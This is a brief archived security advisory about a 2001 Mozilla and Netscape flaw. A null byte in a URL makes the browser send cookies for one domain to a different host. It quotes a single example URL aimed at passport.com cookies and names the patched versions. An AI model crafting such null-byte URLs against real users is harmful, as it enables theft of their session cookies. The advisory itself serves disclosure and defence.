|
COMMAND Mozilla leaks cookies SYSTEMS AFFECTED Mozilla 0.9.5 build 2001111503 and 0.9.5 build 20011012 Netscape 6.1 PROBLEM In Marc Slemko advisory [http://alive.znep.com/~marcs/security] : --snip-- Loading a URL such as: http://alive.znep.com%00www.passport.com/cgi-bin/cookies ...will cause Mozilla to connect to the hostname specified before the \"%00\", but send the cookies to the server based on the entire hostname. The \"%00\" is the URL encoded version of the null character, used in C to terminate strings. --snap-- SOLUTION Update to Netscape 6.2.1 or Mozilla 0.9.7